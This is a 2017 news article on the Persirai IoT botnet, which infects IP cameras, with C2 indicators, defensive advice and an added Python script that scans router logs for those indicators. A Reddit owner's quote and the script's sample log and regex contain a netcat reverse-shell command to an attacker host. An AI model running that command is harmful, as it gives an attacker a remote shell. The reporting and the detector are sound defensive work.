New IOT Attack Linked To Iran – Persirai Malware Strikes at IP Cameras in Latest IOT Attack

Pierluigi Paganini May 12, 2017

Trend Micro has discovered a new attack on internet-based IP cameras and recorders powered by a new Internet of Things (IOT) bot dubbed PERSIRAI.

The new Internet of Things (IOT) malware, detected as ELF_PERSIRAI, has also been traced back to the .IR country-code domain, which is managed by an Iranian research institute that restricts it to Iranians only, indicating a possible state-sponsored cyber strike by Tehran.

“C&C (Command and Control) servers we discovered were found to be using the .IR country code. This specific country code is managed by an Iranian research institute which restricts it to Iranians only. We also found some special Persian characters which the malware author used,” stated Trend Micro in its discovery release posted online.

IP camera users have also encountered the malware and noted that its point of origin appears to be Iran.

“Hello, found the following text on my 2 IP cameras (nc load.gtpnet.ir 1234 -e /bin/sh) and wondering who does that domain belong to? All I know is it is an Iranian address, nothing on whois. I've obviously been hacked; one of these cameras was in the kids' room,” stated one user in the Reddit hacking forum.

The attack is based on the previously successful Mirai IOT strike against IP cameras, which was used to disrupt the Internet with a giant Denial of Service (DoS) attack in 2016.  However, while over 120,000 IP camera systems appear to be infected, over 30% of the Persirai targets are inside China, with only a small fraction located outside of the PRC: in Italy (3%), the UK (3%) and the USA (8%).

The Persirai attack is disturbing on a number of fronts.  Its basis in the open-source Mirai code shows that freely available source code will be modified by attackers and reused in different forms.  Persirai is also very stealthy, leaving most camera owners unaware that their systems are infected.

Yet the most worrying feature is that the command and control servers used to run the malicious botnet are using the .IR country code, that of Iran.  Infected IP cameras report to command servers at:

  • load.gtpnet.ir
  • ntp.gtpnet.ir
  • 185.62.189.232
  • 95.85.38.103
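
As an added example (not code from the article or from Trend Micro's report), the indicators above can be hunted for in home-router DNS and connection logs, together with the netcat command one camera owner reported finding. The log format and the sample lines are constructed for illustration; adapt the parser to whatever format your router or firewall actually writes.

```python
import re
from collections import defaultdict

# C&C hosts the article lists; infected cameras report to these.
PERSIRAI_C2 = {
    "load.gtpnet.ir", "ntp.gtpnet.ir",
    "185.62.189.232", "95.85.38.103",
}

# The command one Reddit user found on their cameras (quoted in the article):
# "nc <host> <port> -e /bin/sh", a netcat reverse shell.
REVERSE_SHELL_RE = re.compile(r"\bnc\s+(\S+)\s+\d+\s+-e\s+/bin/sh\b")

# Constructed sample log: "<timestamp> <source-ip> <kind> <value>".
# This is an assumed, simplified format, not a real router log.
SAMPLE_LOG = """\
2017-05-10T08:01:02 192.168.1.50 dns load.gtpnet.ir
2017-05-10T08:01:03 192.168.1.50 conn 185.62.189.232:1234
2017-05-10T08:02:10 192.168.1.20 dns time.google.com
2017-05-10T08:03:44 192.168.1.51 cmd nc load.gtpnet.ir 1234 -e /bin/sh
2017-05-10T08:04:00 192.168.1.50 conn 95.85.38.103:80
"""


def hunt(log_text):
    """Return {source_ip: [reasons]} for hosts showing Persirai indicators."""
    hits = defaultdict(list)
    for line in log_text.splitlines():
        parts = line.split(maxsplit=3)
        if len(parts) != 4:
            continue  # skip blank or malformed lines
        ts, src, kind, value = parts
        if kind == "dns" and value.lower().rstrip(".") in PERSIRAI_C2:
            hits[src].append(f"{ts} DNS lookup of C2 host {value}")
        elif kind == "conn" and value.rsplit(":", 1)[0] in PERSIRAI_C2:
            hits[src].append(f"{ts} connection to C2 address {value}")
        elif kind == "cmd":
            m = REVERSE_SHELL_RE.search(value)
            if m:
                hits[src].append(f"{ts} netcat reverse shell to {m.group(1)}")
    return dict(hits)


if __name__ == "__main__":
    for src, reasons in hunt(SAMPLE_LOG).items():
        print(src)
        for r in reasons:
            print("   ", r)
```

Any LAN address that appears in the result is a camera (or other device) worth isolating from the Internet and rebooting, then patching or replacing.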

The Persirai attack installs itself and then deletes the installation files to hide its presence on the target camera, running in memory only.  It then downloads and installs additional components, both for control and for blocking rival infections.  Once communication with the command and control server is established, the infected camera is ordered to search for other cameras and infect them as well.


Persirai blocks other exploits from gaining access to a captured IP camera by pointing ftpupdate.sh and ftpupload.sh to /dev/null.  This may be as much an effort to avoid duplicate infections by Persirai itself as to keep other botnet operators from gaining control of the now captured camera.  Because Persirai runs only in memory, it is eliminated once the camera is rebooted, but unless the user takes counter-measures the system will still be vulnerable to the exploit.

While Trend Micro advises IP camera users to use strong passwords, the Persirai attack does not depend on a password attack, nor does it appear to steal passwords.  A better counter-measure is to disable Universal Plug and Play (UPnP) on your router.  UPnP is a network protocol that allows devices such as IP cameras to open a port on the router and act like a server.  This feature also makes the attached devices highly visible targets for the Persirai malware.

Users can also simply remove their IP cameras from Internet access altogether and set up a private VPN to log into the cameras remotely.  Users are also advised to update the firmware on their IP cameras and to keep a close watch on any activity involving outside web addresses.

The Persirai attack is part of a new trend of striking at the Internet through devices not traditionally viewed as computers.  These malware strikes illustrate the problem of vendors selling hardware with little or no security.  There are no current regulations or standards for IOT device security.  Consumers are left on their own and frequently choose low-cost systems that lack basic security features such as encryption or even manufacturer updates.

While many IOT users are aware enough to update their computers and cell phones with the latest software and perform anti-virus checks, they are not aware that other devices such as cameras, washing machines, refrigerators and DVR recorders may also require security checks.  Even DVD players and smart TVs from major manufacturers are vulnerable to exploits, as illustrated by the WikiLeaks release of the WEEPING ANGEL attacks on Samsung TVs, developed by the CIA in co-operation with the UK's GCHQ spy agency.

Details from Trend Micro on Persirai:

http://blog.trendmicro.com/trendlabs-security-intelligence/persirai-new-internet-things-iot-botnet-targets-ip-cameras/

About the author: Charles R. Smith is CEO of Softwar Inc. a US based information warfare company and a former national security journalist.